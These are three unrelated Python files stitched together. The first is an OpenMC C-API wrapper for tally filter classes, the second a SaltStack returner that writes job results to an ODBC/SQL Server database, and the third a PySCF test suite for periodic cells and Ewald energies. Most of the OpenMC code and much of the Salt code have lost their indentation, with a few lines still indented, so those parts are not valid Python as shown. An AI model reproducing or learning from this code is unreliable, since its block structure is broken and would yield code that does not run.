_dll.openmc_mesh_filter_get_mesh.errcheck = _error_handler
_dll.openmc_mesh_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_mesh_filter_set_mesh.restype = c_int
_dll.openmc_mesh_filter_set_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_get_mesh.argtypes = [c_int32, POINTER(c_int32)]
_dll.openmc_meshsurface_filter_get_mesh.restype = c_int
_dll.openmc_meshsurface_filter_get_mesh.errcheck = _error_handler
_dll.openmc_meshsurface_filter_set_mesh.argtypes = [c_int32, c_int32]
_dll.openmc_meshsurface_filter_set_mesh.restype = c_int
_dll.openmc_meshsurface_filter_set_mesh.errcheck = _error_handler
_dll.openmc_new_filter.argtypes = [c_char_p, POINTER(c_int32)]
_dll.openmc_new_filter.restype = c_int
_dll.openmc_new_filter.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_spatial_legendre_filter_get_order.restype = c_int
_dll.openmc_spatial_legendre_filter_get_order.errcheck = _error_handler
_dll.openmc_spatial_legendre_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_spatial_legendre_filter_set_order.restype = c_int
_dll.openmc_spatial_legendre_filter_set_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_sphharm_filter_get_order.restype = c_int
_dll.openmc_sphharm_filter_get_order.errcheck = _error_handler
_dll.openmc_sphharm_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_sphharm_filter_set_order.restype = c_int
_dll.openmc_sphharm_filter_set_order.errcheck = _error_handler
_dll.openmc_zernike_filter_get_order.argtypes = [c_int32, POINTER(c_int)]
_dll.openmc_zernike_filter_get_order.restype = c_int
_dll.openmc_zernike_filter_get_order.errcheck = _error_handler
_dll.openmc_zernike_filter_set_order.argtypes = [c_int32, c_int]
_dll.openmc_zernike_filter_set_order.restype = c_int
_dll.openmc_zernike_filter_set_order.errcheck = _error_handler
_dll.tally_filters_size.restype = c_size_t
class Filter(_FortranObjectWithID):
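    # Cache of live wrapper objects keyed by C-API filter index; weak references
    # let unused wrappers be garbage collected.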
__instances = WeakValueDictionary()
def __new__(cls, obj=None, uid=None, new=True, index=None):
mapping = filters
if index is None:
if new:
# Determine ID to assign
if uid is None:
uid = max(mapping, default=0) + 1
else:
if uid in mapping:
raise AllocationError('A filter with ID={} has already '
'been allocated.'.format(uid))
# Set the filter type -- note that the filter_type attribute
# only exists on subclasses!
index = c_int32()
_dll.openmc_new_filter(cls.filter_type.encode(), index)
index = index.value
else:
index = mapping[uid]._index
if index not in cls.__instances:
instance = super().__new__(cls)
instance._index = index
if uid is not None:
instance.id = uid
cls.__instances[index] = instance
return cls.__instances[index]
@property
def id(self):
filter_id = c_int32()
_dll.openmc_filter_get_id(self._index, filter_id)
return filter_id.value
@id.setter
def id(self, filter_id):
_dll.openmc_filter_set_id(self._index, filter_id)
class EnergyFilter(Filter):
filter_type = 'energy'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
energies = POINTER(c_double)()
n = c_size_t()
_dll.openmc_energy_filter_get_bins(self._index, energies, n)
return as_array(energies, (n.value,))
@bins.setter
def bins(self, bins):
# Get numpy array as a double*
energies = np.asarray(bins)
energies_p = energies.ctypes.data_as(POINTER(c_double))
_dll.openmc_energy_filter_set_bins(
self._index, len(energies), energies_p)
class EnergyoutFilter(EnergyFilter):
filter_type = 'energyout'
class AzimuthalFilter(Filter):
filter_type = 'azimuthal'
class CellFilter(Filter):
filter_type = 'cell'
@property
def bins(self):
cells = POINTER(c_int32)()
n = c_int32()
_dll.openmc_cell_filter_get_bins(self._index, cells, n)
return as_array(cells, (n.value,))
class CellbornFilter(Filter):
filter_type = 'cellborn'
class CellfromFilter(Filter):
filter_type = 'cellfrom'
class CellInstanceFilter(Filter):
filter_type = 'cellinstance'
class DelayedGroupFilter(Filter):
filter_type = 'delayedgroup'
class DistribcellFilter(Filter):
filter_type = 'distribcell'
class EnergyFunctionFilter(Filter):
filter_type = 'energyfunction'
def __new__(cls, energy=None, y=None, uid=None, new=True, index=None):
return super().__new__(cls, uid=uid, new=new, index=index)
def __init__(self, energy=None, y=None, uid=None, new=True, index=None):
if (energy is None) != (y is None):
raise AttributeError("Need both energy and y or neither")
super().__init__(uid, new, index)
if energy is not None:
self.set_data(energy, y)
def set_data(self, energy, y):
"""Set the interpolation information for the filter
Parameters
----------
energy : numpy.ndarray
Independent variable for the interpolation
y : numpy.ndarray
Dependent variable for the interpolation
"""
energy_array = np.asarray(energy)
y_array = np.asarray(y)
energy_p = energy_array.ctypes.data_as(POINTER(c_double))
y_p = y_array.ctypes.data_as(POINTER(c_double))
_dll.openmc_energyfunc_filter_set_data(
self._index, len(energy_array), energy_p, y_p)
@property
def energy(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_energy)
@property
def y(self):
return self._get_attr(_dll.openmc_energyfunc_filter_get_y)
def _get_attr(self, cfunc):
array_p = POINTER(c_double)()
n = c_size_t()
cfunc(self._index, n, array_p)
return as_array(array_p, (n.value, ))
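# Usage sketch (illustrative only, never executed on import): building an
# EnergyFunctionFilter and reading its data back. This assumes an active OpenMC
# C-API session (e.g. the library has been initialized with a model); the helper
# name _energyfunction_filter_example is hypothetical.
def _energyfunction_filter_example():
    energy = np.array([0.0, 1.0e6, 2.0e7])  # independent variable (eV)
    y = np.array([1.0, 2.0, 0.5])           # dependent variable
    f = EnergyFunctionFilter(energy, y)
    # The arrays round-trip through the C API via the energy/y properties.
    return f.energy, f.y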
class LegendreFilter(Filter):
filter_type = 'legendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_legendre_filter_set_order(self._index, order)
class MaterialFilter(Filter):
filter_type = 'material'
def __init__(self, bins=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if bins is not None:
self.bins = bins
@property
def bins(self):
materials = POINTER(c_int32)()
n = c_size_t()
_dll.openmc_material_filter_get_bins(self._index, materials, n)
return [Material(index=materials[i]) for i in range(n.value)]
@bins.setter
def bins(self, materials):
# Get material indices as int32_t[]
n = len(materials)
bins = (c_int32*n)(*(m._index for m in materials))
_dll.openmc_material_filter_set_bins(self._index, n, bins)
class MeshFilter(Filter):
filter_type = 'mesh'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_mesh_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_mesh_filter_set_mesh(self._index, mesh._index)
class MeshSurfaceFilter(Filter):
filter_type = 'meshsurface'
def __init__(self, mesh=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if mesh is not None:
self.mesh = mesh
@property
def mesh(self):
index_mesh = c_int32()
_dll.openmc_meshsurface_filter_get_mesh(self._index, index_mesh)
return RegularMesh(index=index_mesh.value)
@mesh.setter
def mesh(self, mesh):
_dll.openmc_meshsurface_filter_set_mesh(self._index, mesh._index)
class MuFilter(Filter):
filter_type = 'mu'
class ParticleFilter(Filter):
filter_type = 'particle'
class PolarFilter(Filter):
filter_type = 'polar'
class SphericalHarmonicsFilter(Filter):
filter_type = 'sphericalharmonics'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_sphharm_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_sphharm_filter_set_order(self._index, order)
class SpatialLegendreFilter(Filter):
filter_type = 'spatiallegendre'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_spatial_legendre_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_spatial_legendre_filter_set_order(self._index, order)
class SurfaceFilter(Filter):
filter_type = 'surface'
class UniverseFilter(Filter):
filter_type = 'universe'
class ZernikeFilter(Filter):
filter_type = 'zernike'
def __init__(self, order=None, uid=None, new=True, index=None):
super().__init__(uid, new, index)
if order is not None:
self.order = order
@property
def order(self):
temp_order = c_int()
_dll.openmc_zernike_filter_get_order(self._index, temp_order)
return temp_order.value
@order.setter
def order(self, order):
_dll.openmc_zernike_filter_set_order(self._index, order)
class ZernikeRadialFilter(ZernikeFilter):
filter_type = 'zernikeradial'
_FILTER_TYPE_MAP = {
'azimuthal': AzimuthalFilter,
'cell': CellFilter,
'cellborn': CellbornFilter,
'cellfrom': CellfromFilter,
'cellinstance': CellInstanceFilter,
'delayedgroup': DelayedGroupFilter,
'distribcell': DistribcellFilter,
'energy': EnergyFilter,
'energyout': EnergyoutFilter,
'energyfunction': EnergyFunctionFilter,
'legendre': LegendreFilter,
'material': MaterialFilter,
'mesh': MeshFilter,
'meshsurface': MeshSurfaceFilter,
'mu': MuFilter,
'particle': ParticleFilter,
'polar': PolarFilter,
'sphericalharmonics': SphericalHarmonicsFilter,
'spatiallegendre': SpatialLegendreFilter,
'surface': SurfaceFilter,
'universe': UniverseFilter,
'zernike': ZernikeFilter,
'zernikeradial': ZernikeRadialFilter
}
def _get_filter(index):
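    """Return a Filter wrapper of the concrete subclass matching the type of the filter at the given C-API index."""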
filter_type = create_string_buffer(20)
_dll.openmc_filter_get_type(index, filter_type)
filter_type = filter_type.value.decode()
return _FILTER_TYPE_MAP[filter_type](index=index)
class _FilterMapping(Mapping):
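    """Read-only mapping over all filters in the model, keyed by filter ID and backed by the C API."""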
def __getitem__(self, key):
index = c_int32()
try:
_dll.openmc_get_filter_index(key, index)
except (AllocationError, InvalidIDError) as e:
# __contains__ expects a KeyError to work correctly
raise KeyError(str(e))
return _get_filter(index.value)
def __iter__(self):
for i in range(len(self)):
yield _get_filter(i).id
def __len__(self):
return _dll.tally_filters_size()
def __repr__(self):
return repr(dict(self))
filters = _FilterMapping()
|
|
"""
Return data to an ODBC compliant server. This driver was
developed with Microsoft SQL Server in mind, but theoretically
could be used to return data to any compliant ODBC database
as long as there is a working ODBC driver for it on your
minion platform.
:maintainer: C. R. Oldham ([email protected])
:maturity: New
:depends: unixodbc, pyodbc, freetds (for SQL Server)
:platform: all
To enable this returner the minion will need the following installed:
On Linux:
unixodbc (http://www.unixodbc.org)
pyodbc (`pip install pyodbc`)
The FreeTDS ODBC driver for SQL Server (http://www.freetds.org)
or another compatible ODBC driver
On Windows:
TBD
unixODBC and FreeTDS need to be configured via /etc/odbcinst.ini and
/etc/odbc.ini.
/etc/odbcinst.ini::
[TDS]
Description=TDS
Driver=/usr/lib/x86_64-linux-gnu/odbc/libtdsodbc.so
(Note the above Driver line needs to point to the location of the FreeTDS
shared library. This example is for Ubuntu 14.04.)
/etc/odbc.ini::
[TS]
Description = "Salt Returner"
Driver=TDS
Server = <your server ip or fqdn>
Port = 1433
Database = salt
Trace = No
Also you need the following values configured in the minion or master config.
Configure as you see fit::
returner.odbc.dsn: 'TS'
returner.odbc.user: 'salt'
returner.odbc.passwd: 'salt'
Alternative configuration values can be used by prefacing the configuration keys
with ``alternative.``. Any values not found in the alternative configuration will
be pulled from the default location::
alternative.returner.odbc.dsn: 'TS'
alternative.returner.odbc.user: 'salt'
alternative.returner.odbc.passwd: 'salt'
Running the following commands against Microsoft SQL Server in the desired
database as the appropriate user should create the database tables
correctly. Replace with equivalent SQL for other ODBC-compliant servers.
.. code-block:: sql
--
-- Table structure for table 'jids'
--
if OBJECT_ID('dbo.jids', 'U') is not null
DROP TABLE dbo.jids
CREATE TABLE dbo.jids (
jid varchar(255) PRIMARY KEY,
load varchar(MAX) NOT NULL
);
--
-- Table structure for table 'salt_returns'
--
IF OBJECT_ID('dbo.salt_returns', 'U') IS NOT NULL
DROP TABLE dbo.salt_returns;
CREATE TABLE dbo.salt_returns (
added datetime not null default (getdate()),
fun varchar(100) NOT NULL,
jid varchar(255) NOT NULL,
retval varchar(MAX) NOT NULL,
id varchar(255) NOT NULL,
success bit default(0) NOT NULL,
full_ret varchar(MAX)
);
CREATE INDEX salt_returns_added on dbo.salt_returns(added);
CREATE INDEX salt_returns_id on dbo.salt_returns(id);
CREATE INDEX salt_returns_jid on dbo.salt_returns(jid);
CREATE INDEX salt_returns_fun on dbo.salt_returns(fun);
To use this returner, append '--return odbc' to the salt command.
.. code-block:: bash
salt '*' status.diskusage --return odbc
To use the alternative configuration, append '--return_config alternative' to the salt command.
.. versionadded:: 2015.5.0
.. code-block:: bash
salt '*' test.ping --return odbc --return_config alternative
To override individual configuration items, append --return_kwargs '{"key:": "value"}' to the salt command.
.. versionadded:: 2016.3.0
.. code-block:: bash
salt '*' test.ping --return odbc --return_kwargs '{"dsn": "dsn-name"}'
"""
import salt.returners
import salt.utils.jid
import salt.utils.json
# FIXME We'll need to handle this differently for Windows.
try:
import pyodbc
# import psycopg2.extras
HAS_ODBC = True
except ImportError:
HAS_ODBC = False
# Define the module's virtual name
__virtualname__ = "odbc"
def __virtual__():
if not HAS_ODBC:
return False, "Could not import odbc returner; pyodbc is not installed."
return True
def _get_options(ret=None):
"""
Get the odbc options from salt.
"""
attrs = {"dsn": "dsn", "user": "user", "passwd": "passwd"}
_options = salt.returners.get_returner_options(
"returner.{}".format(__virtualname__),
ret,
attrs,
__salt__=__salt__,
__opts__=__opts__,
)
return _options
def _get_conn(ret=None):
"""
    Return an ODBC connection.
"""
_options = _get_options(ret)
dsn = _options.get("dsn")
user = _options.get("user")
passwd = _options.get("passwd")
return pyodbc.connect("DSN={};UID={};PWD={}".format(dsn, user, passwd))
def _close_conn(conn):
"""
    Close the ODBC connection.
"""
conn.commit()
conn.close()
def returner(ret):
"""
Return data to an odbc server
"""
conn = _get_conn(ret)
cur = conn.cursor()
sql = """INSERT INTO salt_returns
(fun, jid, retval, id, success, full_ret)
VALUES (?, ?, ?, ?, ?, ?)"""
cur.execute(
sql,
(
ret["fun"],
ret["jid"],
salt.utils.json.dumps(ret["return"]),
ret["id"],
ret["success"],
salt.utils.json.dumps(ret),
),
)
_close_conn(conn)
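# Illustrative only (not used by Salt): a minimal job-return dict of the shape that
# returner() above consumes. Keys mirror what the INSERT statement reads; the values
# are made up for the example.
def _example_return_payload():
    return {
        "fun": "test.ping",
        "jid": "20240101000000000000",
        "return": True,
        "id": "minion-1",
        "success": True,
    }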
def save_load(jid, load, minions=None):
"""
Save the load to the specified jid id
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """INSERT INTO jids (jid, load) VALUES (?, ?)"""
cur.execute(sql, (jid, salt.utils.json.dumps(load)))
_close_conn(conn)
def save_minions(jid, minions, syndic_id=None): # pylint: disable=unused-argument
"""
Included for API consistency
"""
def get_load(jid):
"""
Return the load data that marks a specified jid
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT load FROM jids WHERE jid = ?;"""
cur.execute(sql, (jid,))
    data = cur.fetchone()
    _close_conn(conn)
    if data:
        # fetchone() returns a single-column row; deserialize the stored load itself
        return salt.utils.json.loads(data[0])
    return {}
def get_jid(jid):
"""
Return the information returned when the specified job id was executed
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT id, full_ret FROM salt_returns WHERE jid = ?"""
cur.execute(sql, (jid,))
data = cur.fetchall()
ret = {}
if data:
for minion, full_ret in data:
ret[minion] = salt.utils.json.loads(full_ret)
_close_conn(conn)
return ret
def get_fun(fun):
"""
Return a dict of the last function called for all minions
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT s.id,s.jid, s.full_ret
FROM salt_returns s
JOIN ( SELECT MAX(jid) AS jid FROM salt_returns GROUP BY fun, id) max
ON s.jid = max.jid
WHERE s.fun = ?
"""
cur.execute(sql, (fun,))
data = cur.fetchall()
ret = {}
if data:
for minion, _, retval in data:
ret[minion] = salt.utils.json.loads(retval)
_close_conn(conn)
return ret
def get_jids():
"""
Return a list of all job ids
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT distinct jid, load FROM jids"""
cur.execute(sql)
data = cur.fetchall()
ret = {}
for jid, load in data:
ret[jid] = salt.utils.jid.format_jid_instance(jid, salt.utils.json.loads(load))
_close_conn(conn)
return ret
def get_minions():
"""
Return a list of minions
"""
conn = _get_conn(ret=None)
cur = conn.cursor()
sql = """SELECT DISTINCT id FROM salt_returns"""
cur.execute(sql)
data = cur.fetchall()
ret = []
for minion in data:
ret.append(minion[0])
_close_conn(conn)
return ret
def prep_jid(nocache=False, passed_jid=None): # pylint: disable=unused-argument
"""
Do any work necessary to prepare a JID, including sending a custom id
"""
return passed_jid if passed_jid is not None else salt.utils.jid.gen_jid(__opts__)
|
|
#!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <[email protected]>
#
import unittest
import ctypes
import numpy
import numpy as np
from pyscf.pbc import gto as pgto
L = 1.5
n = 41
cl = pgto.Cell()
cl.build(
a = [[L,0,0], [0,L,0], [0,0,L]],
mesh = [n,n,n],
atom = 'He %f %f %f' % ((L/2.,)*3),
basis = 'ccpvdz')
numpy.random.seed(1)
cl1 = pgto.Cell()
cl1.build(a = numpy.random.random((3,3)).T,
precision = 1e-9,
mesh = [n,n,n],
atom ='''He .1 .0 .0
He .5 .1 .0
He .0 .5 .0
He .1 .3 .2''',
basis = 'ccpvdz')
def finger(a):
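    """Deterministic scalar fingerprint of an array: dot product of the flattened
    array with fixed cosine weights, used to compare against reference values."""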
w = numpy.cos(numpy.arange(a.size))
return numpy.dot(a.ravel(), w)
class KnownValues(unittest.TestCase):
def test_nimgs(self):
self.assertTrue(list(cl.get_nimgs(9e-1)), [1,1,1])
self.assertTrue(list(cl.get_nimgs(1e-2)), [2,2,2])
self.assertTrue(list(cl.get_nimgs(1e-4)), [3,3,3])
self.assertTrue(list(cl.get_nimgs(1e-6)), [4,4,4])
self.assertTrue(list(cl.get_nimgs(1e-9)), [5,5,5])
def test_Gv(self):
a = cl1.get_Gv()
self.assertAlmostEqual(finger(a), -99.791927068519939, 10)
def test_SI(self):
a = cl1.get_SI()
self.assertAlmostEqual(finger(a), (16.506917823339265+1.6393578329869585j), 10)
np.random.seed(2)
Gv = np.random.random((5,3))
a = cl1.get_SI(Gv)
self.assertAlmostEqual(finger(a), (0.65237631847195221-1.5736011413431059j), 10)
def test_mixed_basis(self):
cl = pgto.Cell()
cl.build(
a = [[L,0,0], [0,L,0], [0,0,L]],
mesh = [n,n,n],
atom = 'C1 %f %f %f; C2 %f %f %f' % ((L/2.,)*6),
basis = {'C1':'ccpvdz', 'C2':'gthdzv'})
def test_dumps_loads(self):
cl1.loads(cl1.dumps())
def test_get_lattice_Ls(self):
#self.assertEqual(cl1.get_lattice_Ls([0,0,0]).shape, (1 , 3))
#self.assertEqual(cl1.get_lattice_Ls([1,1,1]).shape, (13 , 3))
#self.assertEqual(cl1.get_lattice_Ls([2,2,2]).shape, (57 , 3))
#self.assertEqual(cl1.get_lattice_Ls([3,3,3]).shape, (137, 3))
#self.assertEqual(cl1.get_lattice_Ls([4,4,4]).shape, (281, 3))
#self.assertEqual(cl1.get_lattice_Ls([5,5,5]).shape, (493, 3))
cell = pgto.M(atom = '''
C 0.000000000000 0.000000000000 0.000000000000
C 1.685068664391 1.685068664391 1.685068664391''',
unit='B',
basis = 'gth-dzvp',
pseudo = 'gth-pade',
a = '''
0.000000000 3.370137329 3.370137329
3.370137329 0.000000000 3.370137329
3.370137329 3.370137329 0.000000000''',
mesh = [15]*3)
rcut = max([cell.bas_rcut(ib, 1e-8) for ib in range(cell.nbas)])
self.assertEqual(cell.get_lattice_Ls(rcut=rcut).shape, (1097, 3))
rcut = max([cell.bas_rcut(ib, 1e-9) for ib in range(cell.nbas)])
self.assertEqual(cell.get_lattice_Ls(rcut=rcut).shape, (1241, 3))
def test_ewald(self):
cell = pgto.Cell()
cell.unit = 'B'
Lx = Ly = Lz = 5.
cell.a = numpy.diag([Lx,Ly,Lz])
cell.mesh = numpy.array([41]*3)
cell.atom = [['He', (2, 0.5*Ly, 0.5*Lz)],
['He', (3, 0.5*Ly, 0.5*Lz)]]
cell.basis = {'He': [[0, (1.0, 1.0)]]}
cell.verbose = 5
cell.output = '/dev/null'
cell.build()
ew_cut = (20,20,20)
self.assertAlmostEqual(cell.ewald(.05, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(0.1, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(0.2, 100), -0.468640671931, 9)
self.assertAlmostEqual(cell.ewald(1 , 100), -0.468640671931, 9)
def check(precision, eta_ref, ewald_ref):
ew_eta0, ew_cut0 = cell.get_ewald_params(precision, mesh=[41]*3)
self.assertAlmostEqual(ew_eta0, eta_ref)
self.assertAlmostEqual(cell.ewald(ew_eta0, ew_cut0), ewald_ref, 9)
check(0.001, 3.15273336976, -0.468640679947)
check(1e-05, 2.77596886114, -0.468640671968)
check(1e-07, 2.50838938833, -0.468640671931)
check(1e-09, 2.30575091612, -0.468640671931)
cell = pgto.Cell()
numpy.random.seed(10)
cell.a = numpy.random.random((3,3))*2 + numpy.eye(3) * 2
cell.mesh = [41]*3
cell.atom = [['He', (1, 1, 2)],
['He', (3, 2, 1)]]
cell.basis = {'He': [[0, (1.0, 1.0)]]}
cell.verbose = 5
cell.output = '/dev/null'
cell.build()
self.assertAlmostEqual(cell.ewald(1, 20), -2.3711356723457615, 9)
self.assertAlmostEqual(cell.ewald(2, 10), -2.3711356723457615, 9)
self.assertAlmostEqual(cell.ewald(2, 5), -2.3711356723457615, 9)
def test_ewald_2d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,9,60]
cell.verbose = 0
cell.dimension = 2
cell.low_dim_ft_type = 'inf_vacuum'
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), 3898143.7149599474, 4)
a = numpy.eye(3) * 3
a[0,1] = .2
c = pgto.M(atom='H 0 0.1 0; H 1.1 2.0 0; He 1.2 .3 0.2',
a=a, dimension=2, verbose=0)
self.assertAlmostEqual(c.ewald(), -3.0902098018260418, 9)
def test_ewald_1d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,60,60]
cell.verbose = 0
cell.dimension = 1
cell.low_dim_ft_type = 'inf_vacuum'
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), 70.875156940393225, 8)
def test_ewald_0d_inf_vacuum(self):
cell = pgto.Cell()
cell.a = numpy.eye(3)
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [60] * 3
cell.verbose = 0
cell.dimension = 0
cell.low_dim_ft_type = 'inf_vacuum'
cell.build()
eref = cell.to_mol().energy_nuc()
self.assertAlmostEqual(cell.ewald(), eref, 2)
def test_ewald_2d(self):
cell = pgto.Cell()
cell.a = numpy.eye(3) * 4
cell.atom = 'He 0 0 0; He 0 1 1'
cell.unit = 'B'
cell.mesh = [9,9,60]
cell.verbose = 0
cell.dimension = 2
cell.rcut = 3.6
cell.build()
self.assertAlmostEqual(cell.ewald(), -5.1194779101355596, 9)
# def test_ewald_1d(self):
# cell = pgto.Cell()
# cell.a = numpy.eye(3) * 4
# cell.atom = 'He 0 0 0; He 0 1 1'
# cell.unit = 'B'
# cell.mesh = [9,60,60]
# cell.verbose = 0
# cell.dimension = 1
# cell.rcut = 3.6
# cell.build()
# self.assertAlmostEqual(cell.ewald(), 70.875156940393225, 8)
#
# def test_ewald_0d(self):
# cell = pgto.Cell()
# cell.a = numpy.eye(3)
# cell.atom = 'He 0 0 0; He 0 1 1'
# cell.unit = 'B'
# cell.mesh = [60] * 3
# cell.verbose = 0
# cell.dimension = 0
# cell.build()
# eref = cell.to_mol().energy_nuc()
# self.assertAlmostEqual(cell.ewald(), eref, 2)
def test_pbc_intor(self):
numpy.random.seed(12)
kpts = numpy.random.random((4,3))
kpts[0] = 0
self.assertEqual(list(cl1.nimgs), [32,21,19])
s0 = cl1.pbc_intor('int1e_ovlp_sph', hermi=0, kpts=kpts)
self.assertAlmostEqual(finger(s0[0]), 492.30658304804126, 4)
self.assertAlmostEqual(finger(s0[1]), 37.812956255000756-28.972806230140314j, 4)
self.assertAlmostEqual(finger(s0[2]),-26.113285893260819-34.448501789693566j, 4)
self.assertAlmostEqual(finger(s0[3]), 186.58921213429491+123.90133823378201j, 4)
s1 = cl1.pbc_intor('int1e_ovlp_sph', hermi=1, kpts=kpts[0])
self.assertAlmostEqual(finger(s1), 492.30658304804126, 4)
def test_ecp_pseudo(self):
from pyscf.pbc.gto import ecp
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Cu 0 0 1; Na 0 1 0',
ecp = {'Na':'lanl2dz'},
pseudo = {'Cu': 'gthbp'})
self.assertTrue(all(cell._ecpbas[:,0] == 1))
cell = pgto.Cell()
cell.a = numpy.eye(3) * 8
cell.mesh = [11] * 3
cell.atom='''Na 0. 0. 0.
H 0. 0. 1.'''
cell.basis={'Na':'lanl2dz', 'H':'sto3g'}
cell.ecp = {'Na':'lanl2dz'}
cell.build()
v1 = ecp.ecp_int(cell)
mol = cell.to_mol()
v0 = mol.intor('ECPscalar_sph')
self.assertAlmostEqual(abs(v0 - v1).sum(), 0.029005926114411891, 8)
def test_ecp_keyword_in_pseudo(self):
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = 'lanl2dz',
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, 'lanl2dz')
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = {'na': 'lanl2dz'},
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'na': 'lanl2dz', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'O': 'gthbp'})
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'S 0 0 1',
ecp = {'S': 'gthbp', 'na': 'lanl2dz'},
pseudo = {'O': 'gthbp', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.ecp, {'na': 'lanl2dz', 'Cu': 'stuttgartrsc'})
self.assertEqual(cell.pseudo, {'S': 'gthbp', 'O': 'gthbp'})
def test_pseudo_suffix(self):
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Mg 0 0 1',
pseudo = {'Mg': 'gth-lda'})
self.assertEqual(cell.atom_nelec_core(0), 2)
cell = pgto.M(
a = np.eye(3)*5,
mesh = [9]*3,
atom = 'Mg 0 0 1',
pseudo = {'Mg': 'gth-lda q2'})
self.assertEqual(cell.atom_nelec_core(0), 10)
    def test_pbc_intor_symmetry(self):
a = cl1.lattice_vectors()
b = numpy.linalg.inv(a).T * (numpy.pi*2)
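        # Rows of b are the reciprocal lattice vectors, so dot(a[i], b[j]) == 2*pi*delta_ij.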
kpts = numpy.random.random((4,3))
kpts[1] = b[0]+b[1]+b[2]-kpts[0]
kpts[2] = b[0]-b[1]-b[2]-kpts[0]
kpts[3] = b[0]-b[1]+b[2]+kpts[0]
s = cl1.pbc_intor('int1e_ovlp', kpts=kpts)
self.assertAlmostEqual(abs(s[0]-s[1].conj()).max(), 0, 12)
self.assertAlmostEqual(abs(s[0]-s[2].conj()).max(), 0, 12)
self.assertAlmostEqual(abs(s[0]-s[3] ).max(), 0, 12)
def test_basis_truncation(self):
b = pgto.basis.load('gthtzvp@3s1p', 'C')
self.assertEqual(len(b), 2)
self.assertEqual(len(b[0][1]), 4)
self.assertEqual(len(b[1][1]), 2)
def test_getattr(self):
from pyscf.pbc import scf, dft, cc, tdscf
cell = pgto.M(atom='He', a=np.eye(3)*4, basis={'He': [[0, (1, 1)]]})
self.assertEqual(cell.HF().__class__, scf.HF(cell).__class__)
self.assertEqual(cell.KS().__class__, dft.KS(cell).__class__)
self.assertEqual(cell.UKS().__class__, dft.UKS(cell).__class__)
self.assertEqual(cell.KROHF().__class__, scf.KROHF(cell).__class__)
self.assertEqual(cell.KKS().__class__, dft.KKS(cell).__class__)
self.assertEqual(cell.CCSD().__class__, cc.ccsd.RCCSD)
self.assertEqual(cell.TDA().__class__, tdscf.rhf.TDA)
self.assertEqual(cell.TDBP86().__class__, tdscf.rks.TDDFTNoHybrid)
self.assertEqual(cell.TDB3LYP().__class__, tdscf.rks.TDDFT)
